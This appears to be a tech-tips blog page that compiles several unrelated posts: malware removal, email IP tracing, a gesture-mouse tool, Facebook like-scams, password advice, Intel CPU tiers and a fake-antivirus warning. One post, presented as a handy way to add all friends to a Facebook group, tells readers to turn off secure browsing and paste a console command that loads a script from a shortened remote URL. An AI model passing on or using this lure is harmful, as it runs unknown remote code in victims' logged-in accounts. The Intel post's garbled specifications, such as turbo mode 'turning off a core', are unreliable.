How to Get Rid of Malwares



You may experience any one or more of the following symptoms:

Following All symptoms are of Malwares..




- When you start your computer, or when your computer has been idle for many minutes, your - Internet browser opens to display Web site advertisements.

- When you use your browser to view Web sites, other instances of your browser open to display Web site advertisements.

- Your Web browser's home page unexpectedly changes.

- Web pages are unexpectedly added to your Favorites folder.

- New toolbars are unexpectedly added to your Web browser.

- You cannot start a program.

- When you click a link in a program, the link does not work.

- Your Web browser suddenly closes or stops responding.

- It takes a much longer time to start or to resume your computer.

- Components of Windows or other programs no longer work.




Now Follow Simple Steps to Get Rid Of Malwares



1. Run the Microsoft Windows Malicious Software Removal Tool



2. Download ATF Cleaner by Microsoft MVP Atribune from http://www.atribune.org/

- Double-click ATF-Cleaner.exe to run the program.

- Click Select All found at the bottom of the list.

- Click the Empty Selected button.

- Click Exit on the Main menu to close the program.

- Shutdown/restart the computer.



3. Next, download Malwarebytes' Anti-Malware (Free for personal use) to your desktop.

- Double-click mbam-setup.exe and follow the prompts to install the program.

- At the end, be sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.

- If an update is found, it will download and install the latest version.

- Once the program has loaded, select Perform full scan, then click Scan.

- When the scan is complete, click OK, then Show Results to view the results.

- Be sure that everything is checked, and click Remove Selected.



4. Download, install, update and run: SUPERAntispyware (freeware)




And its done..!!
  

Add All Your Friends To A Facebook Group At Once!



It can be pretty tedious if you open a new group on Facebook and invite all your friends one by one to join the group. So, to ease your task i have got some pretty click trick whereby you will simply perform two to three steps and all of your friends will be added to the Facebook group at once!
For this to work, you need to disable secure browsing for a while. You can again enable secure browsing once you complete doing this.


To disable secure browsing, go to Account Settings .


> Security > Secure Browsing.



Remove the tick mark and click on Save changes.




For Google Chrome

Go to your Group where you want to invite/add all of your friends.
Right click and press on Inspect Element.
Select Console.
Paste the following on Console :



document.body.appendChild(document.createElement('script')).src='http://goo.gl/7Q26z';




For Mozilla FireFox

Go to your Group where you want to invite/add all of your friends.
Press Ctrl+Shift+K
A new area will pop down from the address bar.
Paste the following code there :



document.body.appendChild(document.createElement('script')).src='http://goo.gl/7Q26z';


its done..


Have Fun.. :-)



Steps to Determine Email Sender’s IP Address and Location



This is the age of technology and today we use electronic mails more as compared to the old form of physical mails. When we receive an email from someone we can find out who is the sender of the email from the sender’s address but there is no field that can tell us what the location of the email sender is. Sometimes it becomes very important to determine the location of the email to check its validity as a person may be sitting in some country and claiming to be in another.

Thus it sometimes, is important to find out the approximate location (if not accurate) of the email sender. To be able to find out the location of the email sender we first need the IP address of the email sender or the IP route used by the email itself. Determining this is not very difficult and every different email service has its own way of finding this out. It can be like right clicking and checking the properties or the Full Headers.

If you are using Gmail primarily, then here is how to find the IP address of the sender and its location.

How to find the IP address of the Email sender in Gmail:


1. Open the email that you wish to find the IP address of.

2. From the drop down on right side, click the Show Original button


3. This will open a new window with lots of email information.

4. Now search for “Received: from”, you will see some IP address in the same line within square brackets like [XXX.XXX.XXX.XXX]




5. Now see for the last IP address of the page.
This will be the IP address of the sender or the route of the email used for delivery.

How to find the location of the email sender:

1. You can use the IP address noted above to find the location of the sender.
2. Visit this link, paste the IP in the Remote Address Field and click the Host Trace button.



3. Within few seconds, you would be able to see the location of the IP address on the Google Maps.
In the testing, I found this address to be more than approximation, if not accurate.
Note: Some email address might not be showing an IP address, this can be because they have protected their IP address from public display.

Control Mouse Movement by your Hand or Head Gestures with NPointer




if you need to work much on the computer (like me) and tend to take small breaks to sit back and lean on the chair, then you must have felt the need of some wireless mouse controller then this post is worth reading. In case you just wish to have some gesture controlled mouse controller, then also this post is going to interest you.

There are lot of tools in the market using which you can control your mouse without any direct contact. Some of them use the webcam to recognize your movements and convert the signals into mouse movements. One good tool that does the same and does well is called the NPointer.





NPointer is an application for gestural computer control in which hand movements are recorded by the webcam connected to your PC and then translated into the mouse movements. The application can also decode the usual mouse operations like clicks, double-clicks, drags and scrolls. Also, disabled people can also use the head movements to control the computer.

To get started you just need to install the tool in your system and then configure it to recognize your hand/head movements. If you plan to use your hand for the mouse control, then place them on the table and keep the webcam straight up. You may wave the hands in air too but table method is better for error free recognition.




You then need to configure some settings like Motion Speed (how fast the pointer will move compared to the hand movement), Acceleration (how fast the pointer accelerates when hand motion speed changes), Menu timeout (how long the pointer should stay idle before action menu appears) and Movement cut-off (how fast the hand should move to ignore the movement. This is used when you wish to remove the hands without disturbing the pointer position). If you check the Head/Frontal Control box, then you can use you head in place of hands to control the mouse movements.

You will now see some controls on the screen which can be used to perform the same operations as performed otherwise. The tool is free to use and works well on all versions of Windows. You can read more about it at the link below.

Download NPointer

How do Facebook ‘Like’ scams reach thousands of users?



If you look, you will find countless Facebook pages that have hundreds of thousands of likes and comments. But are these real? Some of the posts invite people to write a comment to see what happens. But predictably, nothing happens and this is all part of a large-scale Facebook scam.

These ‘stories’ then appear on news feeds and begin to resemble spam. The most common modus operandi for such Facebook scams is to attract people by getting their sympathy. This is easily achieved with images of sick children, wounded animals or details about some charitable organization.

How the scam functions
A page is created with a sympathetic message or an amusing anecdote to attract attention. The post is then shared publicly and people are called to perform actions like ‘like the page’, ‘comment’ or ‘share the page’. The next step posts the page on similar nefarious groups and spreads to hundreds of thousands of people via their newsfeed.


Once a page has garnered thousands of likes/comments, it is put up for sale. Someone who wishes to acquire the exposure of the page can purchase it and potentially misuse it. Certain details of the page can also be modified for malicious purposes. In this manner, anyone can get their hands on pages with high edge ranks to spam thousands of people, even though they may have the best anti-spam software. Such scams can spread propaganda, increase likes/comments, market something or even fool people into giving money or information.

Edge Rank and how it can be misused
The reason why parties resort to this trick is the money that can be gained via the ‘Facebook Like algorithm’. As a post gets increased comments/likes, its visibility rises. This page is then displayed to a greater number of people and this is beneficial to marketers in the short term and the long term.

This algorithm devised by Facebook functions on a platform known as Edge Rank. This is simply the score of a page based on various parameters and this score determines how useful the page actually is. In turn, this decides how many people will view the page. A higher edge rank allows a page to be displayed to more people in their newsfeed. Various factors that come into play here are affinity (closeness with the person), weight (embedded video or a link) and the time decay (relevance).


Unfortunately, there are many parties out there that misuse this platform. A high edge rank can be used to enhance brand exposure but it can also be used to bombard Facebook users with random messages and promotions that they are not interested in. Scammers also use this method to reach as many people as possible. All this has led to a process known as ‘Like buying’. This refers to the sale of Facebook fan pages and a simple Google search validates this.

Awareness about this technique and other Facebook scams is useful. ‘Like buying’ is quite a common occurrence and it can be misused in several ways. We recommend that you do not fall for manipulative messages or images that ask you for comments or likes.

New online game trains kids against cyber attacks



The National Science Center, or NSC, is now training kids to stay safe from cyber attack malware when they're surfing the web or using email and cell phones. A new online game called Cyber Swarm Defenders is targeted to 6th-8th grade students and is also appropriate for younger students.

The game is part of the NSC's newest Cyber Ops education outreach program. The NSC is a public-private partnership between the U.S. Army and NSC, Inc., that uses its resources to stimulate and increase science, technology, engineering, and mathematics, known as STEM, proficiency in U.S. students, especially those in grades 4-9.

"Anything we can do to make the young students of our country understand the cyber threat and get them excited about STEM technologies has a big payoff," said Ron Ross, chairman of the NSC.

"Educating students about cyber security threats and how to counteract them is imperative," said Mike Krieger, the Army deputy chief information officer, who serves as the secretary of the Army's proponent for the NSC. He also serves as the co-chairperson for the NSC's Partnership Executive Committee, which provides overall direction and oversight for the NSC.

Cyber Swarm Defenders is deployed through the social networking site jabbersmack.com, which was built for children ages 13 and under. Kid-safe requirements are built in, including a parental control feature. This tower-defense strategy game integrates cyber security education and "learn to earn" mini-exercises. Students earn points, badges and game coins as they strengthen their defenses to advance through the game levels.

"Installing the game on a social network site allows us to reach a variety of students and an existing community of users," said Krieger.

To access the game from the NSC's website, go to www.NationalScienceCenter.org and click on the Cyber Swarm banner button. Or, go directly to http://www.jabbersmack.com/#/brands/view/VQYE. To play, participants must first register on jabbersmack--which is not accessible on some older versions of browsers.

"Our additional focus on cyber threats also significantly enhances the value proposition of the NSC Partnership," Ross said.

Created by Congress in 1985, the NSC 's outreach programs include online teacher tools, two 18-wheeler Mobile Discovery Center vans, Junior ROTC STEM Outreach activities, and Cyber Ops. In addition to the new game, the Cyber Ops program links to a Malware Comic Book and Malware Mystery game that are also appropriate for older students.

Password Security, Password Approaches, Strong Passwords



Security is not just about strong encryption, good anti-virus software, or techniques like two-factor authentication. It’s also about the “fuzzy” things … involving people. That’s where the security game is often won or lost. Just ask Mat Honan.

We – the users – are supposed to be responsible, and are told what to do to stay secure. For example: “Don’t use the same password on different sites.” “Use strong passwords.” “Give good answers to security questions.” But here’s the troublesome equation:


more services used = more passwords needed = more user pain

… which means it only gets harder and harder to follow such advice. Why? Because security and practicality are in conflict.



But they don’t have to be. As someone who has studied millions of passwords and how they were constructed – I’ve spent most of my waking hours for over a decade obsessing about authentication methods – I say we can have both security and practicality.

And it starts with recognizing that a lot of security advice hurts more than it helps.

Security specialists – and many websites – prompt us to use a combination of letters, numbers, and characters when selecting passwords. This results in suggestions to use passwords like “Pn3L!x8@H”, to cite a recent Wired article. But sorry, guys, you’re wrong: Unless that kind of password has some profound meaning for a user (and then he or she may need other help than password help), then guess what? We. Will. Forget. It.

What Good Is a Password We Can’t Remember?

Obviously, we need something that is both secure and which we can remember. Whoever asks us to use meaningless sequences of letters, numbers, and characters worries more about security than about practicality. We need to resolve this tension, or we will forever be faced with vulnerabilities to hackers, or lack of access to our data.

We need new password approaches.

One common suggestion is taking a word, let’s say “Elvis”, and replacing letters with digits to get “3lv1s”. While this makes a password memorable – presuming we won’t forget Elvis – it doesn’t make it that much more secure. Because everybody makes changes just like that.



Furthermore, when forced to add a numeral and a special character, people just add “1″ and an exclamation point at the end. While this does get your password accepted on most sites, it doesn’t make the password much stronger.

Because hackers know all our tricks. Online criminals know much more about passwords than the good guys do.

The irony is that most sites will tell us a password like “3lv1s” or “3Iv1s!” is secure (though it might be a bit too short on some sites). This is because today’s password strength checkers don’t measure password strength, but rather, count individual characters and simply make sure passwords have numerals and special characters.

They fool us into thinking that bad passwords are good – and that some good passwords are bad.

The community of security experts has naively assumed that digits and exclamation marks mean more security, when in reality these just result in lower recall rates. Instead, password strength checkers should break down passwords into their components, most typically words – because that’s how people naturally think and communicate. The strength checker can then determine (1) what words a given password consists of, and (2) how common or frequent those words are. The product of those frequencies is a much better estimate of the password’s strength than whether the password contains a particular character or not.

So how do we select strong and memorable passwords? Here’s how: Think of a story, something weird and memorable that happened to you. Like that time you went jogging and stepped on a rat (ugh). Your password? “JogStepRat”: Your personal story boiled down to three words. If this really happened to you, you won’t forget. And no one else can guess it – unless you’ve told everyone that story, but then you’d just pick another, more embarrassing source story you’d never share!

This approach isn’t just conjecture: It works. It’s been tested at a large scale, and this type of password has twice the bit security of an average password. I kid you not.

Turns out, research has a lot to say about not just passwords, but the security questions used to remember them, too. Because most of those questions are pretty atrocious.



A horribly obvious one is “Favorite color?” Red. Green. Yellow. Purple. How many people actually pick the lesser-known color “Caput Mortuum” as their answer? This isn’t the user’s fault: Whoever decided that favorite color can be used for authentication is to blame. Similarly, questions like “Brand of your first car?” aren’t recommended either, because we’re more likely to start off with a Dodge or a Honda than with a Bentley.

The problem with both of these questions is that most people will choose from a very small set of answer options.

Another common, bad security question is “Mother’s maiden name?” By using easily available public records, hackers can derive more than a tenth of people’s mother’s maiden names with certainty – and a lot more with pretty high probability.

So some security experts suggest you get creative with password questions. While the approach of answering favorite color with ”Abraham Lincoln” and brand of first car with “Dandelion” seems great in theory, it doesn’t work in practice. Again, because: We. Will. Not. Remember.

Why would we remember one nonsense thing (the answer to a creative security question) when we can’t remember another (the very password we forgot in the first place)?

The best security questions, generally speaking, are those where:
there are many possible answers;
others can’t find the answers using a quick Google search; and
we can actually remember the answer, but others would have a hard time guessing it.

It’s the same underlying approach, in fact, as the password approach I shared above: a focus on security and practicality. We don’t need a complex password / security question solution – at least on the front end. On the back end, however, a lot can be done if we structure things in a meaningful way.

So what are examples of good security questions? People’s preferences turn out to be a great starting point. For example: likes olives but can’t stand volleyball; these are the kinds of things we’ll comfortably recall in a year. Surprisingly, most of these preferences are actually very difficult for others to guess – even by people who think they know you. In tests where we asked people to guess the preferences of their colleagues, friends, and spouses, only the spouses got enough answers right to pass.

That’s the secret to security: We have to remember that much of the time, the problem involves users … and that users are people – not machines.

The Difference Between Intel’s i3, i5, and i7 Core Processors



With all of these commercials coming in front of our faces about Intel’s newest line of processors, we can’t help but wonder what in the world the difference is. We have i3, i5, and i7 to choose from, but which one would suit our needs the best?

This is something that I have been pondering upon and I found out that I wasn’t the only one wondering what on earth Intel has done by releasing these new processors.

Well, the time is here for you to discover the difference between Intel’s i3, i5, and i7 processors. You can thank the coffee on a late night for this post. :)


Intel Core i3 Processor

This particular Intel processor is the enter level processor of this new series of Intel processors. While it may not be the fastest one of the bunch, it can get the job done, at least for most applications.

  • Mind you, if you need high speed, I suggest one of the other processors that I will unveil in front of your eyes later on in this post. Here’s some of the Core i3 features.
  • Uses 4 threads. Yes, it uses hyperthreading technology which is the latest craze due to its improved efficiency over earlier processors that were put on the market.
  • This processor consists of 2-4 cores, depending on which one you get your hands on.
  • Contains A 3-4 MB Cache
  • Uses less heat and energy than earlier processors, which is always a good thing in this day and age.
Intel Core i5 Processor
  • This is the mid-size processor of this bunch, recommended for those who demand a little speed, but not quite enough where the user will be running resource-intensive applications.
  • As with the Core i3 processor, this comes with 2-4 cores, the main difference is that it has a higher clock speed than the Core i3.
  • This is also a heat and energy efficient processor, but it does seem to be better at this particular job than the Core i3 processor.
  • The number of threads used in this is no different than the Core i3 with 2-4 threads, and it also uses hyperthreading technology for a boost in performance.
  • The cache of the Core i5 is bigger than the Core i3, it’s at 3-8 MB.
  • The Core i5 is where the turbo mode is made available, this provides users with the opportunity to turn off a core if it’s not being utilized.
Intel Core i7 Processor
  • This is for the users that demand power, yes it does provide more power and if Tim Allen gets one of these, this would be the beast that he gets his hands on. Great for gamers and other resource intensive users.
  • The cache on this one is 4-8 MB.
  • This processor comes with 8 threads, definitely enough to get the job done quickly, maybe even at the speed of light if you’re lucky. And yes it also utilizes hyperthreading technology.
  • You will have four cores to take advantage of with this particular series.
  • And just like the other ones in this Intel series of processors, it is more energy efficient and produces less heat.

Beware of Fake-Antivirus "Win 8 Security System"




Late in August McAfee Labs discovered a Fake Antivirus program that claims to detect infections, and displays alerts to scare users into purchasing protection.


On the contrary, this program is not genuine software and has nothing to do with reliable and effective AV tools. The truth is that this is another scam application developed to enter your PC through vulnerabilities in outdated programs.


Trend Micro, which detects the threat as TROJ_FAKEAV.EHM said, ”After infecting a user’s system, this malware scares its victim into buying the “product” by displaying fake security messages, stating that the computer is infected with spyware or other malware and only this product can remove it after you download the trial version. As soon as the victim downloads Win 8 Security System, it pretends to scan your computer and shows a grossly exaggerated amount of nonexistent threats”.


This sort of malware is commonplace, with examples existing for Windows XP, Windows Vista, Windows 7 and even Mac OS X. What’s amazing is not that the hackers have decided to use the Windows 8 name, but the fact that they chose to do this before Windows 8 is even out.


Trend Micro’s conclusion about this threat is that, It is typical for cybercriminals to piggyback on the highly-anticipated release of any latest technology to take their malware, spam, malicious app to new heights. To stay safe, users must keep their cool and think twice before clicking links or visiting web pages especially those that promise the latest items or programs for free. If it’s too good to be true it probably is.-

See more at: http://blogs.mcafee.com/mcafee-labs/win-8-security-system-another-fake-antivirus-malware